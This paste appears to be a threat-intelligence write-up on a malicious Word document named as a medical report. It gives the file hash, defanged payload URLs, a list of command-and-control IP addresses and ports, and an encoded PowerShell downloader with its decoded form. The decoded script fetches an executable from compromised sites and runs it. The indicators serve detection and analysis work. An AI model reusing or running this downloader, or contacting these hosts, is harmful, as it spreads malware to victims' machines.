Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Hashes of doc
- =============
- 15183c499484fa82ec8625bbee60f21590dfe1d8c8febd9eb6bf8392dd915593 SU-6624 Medical report p2.doc
- URLs found in doc
- =================
- hxxps://juice-dairy.com/wp-content/0axb/
- hxxp://yamamotovn.com/wp-admin/m3rW76/
- hxxp://huaweisolarinverter.com/eng/QQ/
- hxxp://ceciliatessierirabassi.com/ctr/IKh9/
- hxxps://tailgatecheap.com/wp-admin/kQXm/
- Config (via Triage)
- ====================
- https://tria.ge/reports/191107-z2nj9h9nb2/task1
- 165.227.156.155:443
- 104.239.175.211:8080
- 67.225.179.64:8080
- 192.241.220.155:8080
- 179.12.170.148:8080
- 5.196.74.210:8080
- 189.209.217.49:80
- 178.79.161.166:443
- 190.228.72.244:53
- 105.228.98.115:443
- 31.172.240.91:8080
- 136.243.177.26:8080
- 87.230.19.21:8080
- 171.101.153.86:990
- 37.157.194.134:443
- 209.141.41.136:8080
- 91.205.215.66:8080
- 167.99.105.223:7080
- 83.136.245.190:8080
- 167.71.10.37:8080
- 85.104.59.244:20
- 182.176.132.213:8090
- 104.236.246.93:8080
- 186.4.172.5:8080
- 62.75.187.192:8080
- 186.4.172.5:443
- 31.12.67.62:7080
- 192.81.213.192:8080
- 95.128.43.213:8080
- 211.63.71.72:8080
- 92.222.216.44:8080
- 212.129.24.79:8080
- 173.212.203.26:8080
- 47.41.213.2:22
- 86.22.221.170:80
- 94.177.216.217:8080
- 173.249.47.77:8080
- 176.31.200.130:8080
- 181.143.194.138:443
- 178.210.51.222:8080
- 78.24.219.147:8080
- 46.105.131.87:80
- 45.33.49.124:443
- 169.239.182.217:8080
- 200.71.148.138:8080
- 186.75.241.230:80
- 217.160.182.191:8080
- 181.31.213.158:8080
- 87.106.136.232:8080
- 206.189.98.125:8080
- 104.131.11.150:8080
- 37.187.2.199:443
- 103.39.131.88:80
- 115.78.95.230:443
- 190.211.207.11:443
- 138.201.140.110:8080
- 104.131.44.150:8080
- 190.145.67.134:8090
- 186.4.172.5:20
- 181.57.193.14:80
- 80.11.163.139:21
- 190.53.135.159:21
- 200.51.94.251:80
- 183.102.238.69:465
- 212.71.234.16:8080
- 87.106.139.101:8080
- 94.205.247.10:80
- 190.226.44.20:21
- 190.51.63.1:80
- 59.103.164.174:80
- 149.202.153.252:8080
- 152.89.236.214:8080
- 144.139.247.220:80
- 159.65.25.128:8080
- Base64 code --> decoded
- ========================
- Triple encoded with 'owns'
- --------------------------
- JABRAGUAcABpAG8AZgBtAGYAZgBkAD0AJwBDAGQAcgBuAHIAYQBpAHIAegBsAHMAeQAnADsAJABFAG8AdgBlAGsAaABnAHcAcgAgAD0AIAAnADkAMAA5ACcAOwAkAFcAZQBrAHcAbQBpAHIAdQBoAGEAegA9ACcATgBiAHUAZQBkAHUAdABiAHQAJwA7ACQASwBsAHAAaQB1AGwAYQBoAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABFAG8AdgBlAGsAaABnAHcAcgArACcALgBlAHgAZQAnADsAJABXAGkAdABrAGUAbAByAGwAdgBxAHEAPQAnAEgAbwBrAGwAaQBqAG4AcgB2AGMAZQB5ACcAOwAkAFIAYgBmAHMAdQBkAHoAdQA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwBiACcAKwAnAGoAZQBjAHQAJwApACAATgBlAFQALgB3AGUAYgBDAEwAaQBlAG4AdAA7ACQAVwBlAG0AZABvAGQAZAB6AHYAdQByAGcAbAA9ACcAaAB0AHQAcABzADoALwAvAGoAdQBpAGMAZQAtAGQAYQBpAHIAeQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADAAYQB4AGIALwAqAGgAdAB0AHAAOgAvAC8AeQBhAG0AYQBtAG8AdABvAHYAbgAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbQAzAHIAVwA3ADYALwAqAGgAdAB0AHAAOgAvAC8AaAB1AGEAdwBlAGkAcwBvAGwAYQByAGkAbgB2AGUAcgB0AGUAcgAuAGMAbwBtAC8AZQBuAGcALwBRAFEALwAqAGgAdAB0AHAAOgAvAC8AYwBlAGMAaQBsAGkAYQB0AGUAcwBzAGkAZQByAGkAcgBhAGIAYQBzAHMAaQAuAGMAbwBtAC8AYwB0AHIALwBJAEsAaAA5AC8AKgBoAHQAdABwAHMAOgAvAC8AdABhAGkAbABnAGEAdABlAGMAaABlAGEAcAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AawBRAFgAbQAvACcALgAiAFMAcABgAGwAaQBUACIAKAAnACoAJwApADsAJABVAGMAegBuAGMAawB2AGEAZABwAGcAPQAnAEoAbwBqAHEAdwBhAGEAeABwAGsAaQBzACcAOwBmAG8AcgBlAGEAYwBoACgAJABMAG8AdQBoAG0AcgB0AGQAIABpAG4AIAAkAFcAZQBtAGQAbwBkAGQAegB2AHUAcgBnAGwAKQB7AHQAcgB5AHsAJABSAGIAZgBzAHUAZAB6AHUALgAiAGQAbwB3AE4AbABvAGAAQQBEAGAARgBgAEkAbABlACIAKAAkAEwAbwB1AGgAbQByAHQAZAAsACAAJABLAGwAcABpAHUAbABhAGgAKQA7ACQAWABhAGcAbwBtAG8AeAB3AGkAPQAnAE8AcQB6AGcAawB1AGUAcwAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEsAbABwAGkAdQBsAGEAaAApAC4AIgBMAGUAbgBgAEcAYABUAEgAIgAgAC0AZwBlACAAMwAwADkAMAA0ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAYABUAEEAcgB0ACIAKAAkAEsAbABwAGkAdQBsAGEAaAApADsAJABMAGwAaAB4AHEAcQBmAHMAPQAnAFMAZAB4AHoAeABhAHQAYgB4AG0AZwBuACcAOwBiAHIAZQBhAGsAOwAkAEsAYQBxAGUAcABkAGEAdgBjAD0AJwBVAGgAcAB5AGgAcgBwAGYAaAB2AG0AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATgB0AGwAcgBxAHIAdwB5AHgAPQAnAFAAegBhAGMAbgB1AHcAYgBjAGoAYwAnAA==
- -----
- $Qepiofmffd='Cdrnrairzlsy'
- $Eovekhgwr = '909'
- $Wekwmiruhaz='Nbuedutbt'
- $Klpiulah=$env:userprofile+'\'+$Eovekhgwr+'.exe'
- $Witkelrlvqq='Hoklijnrvcey'
- $Rbfsudzu=.('new-'+'ob'+'ject') NeT.webCLient
- $Wemdoddzvurgl='https://juice-dairy.com/wp-content/0axb/*http://yamamotovn.com/wp-admin/m3rW76/*http://huaweisolarinverter.com/eng/QQ/*http://ceciliatessierirabassi.com/ctr/IKh9/*https://tailgatecheap.com/wp-admin/kQXm/'."Sp`liT"('*')
- $Ucznckvadpg='Jojqwaaxpkis'
- foreach($Louhmrtd in $Wemdoddzvurgl){try{$Rbfsudzu."dowNlo`AD`F`Ile"($Louhmrtd, $Klpiulah)
- $Xagomoxwi='Oqzgkues'
- If ((.('G'+'et-I'+'tem') $Klpiulah)."Len`G`TH" -ge 30904) {[Diagnostics.Process]::"S`TArt"($Klpiulah)
- $Llhxqqfs='Sdxzxatbxmgn'
- break
- $Kaqepdavc='Uhpyhrpfhvm'}}catch{}}$Ntlrqrwyx='Pzacnuwbcjc'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement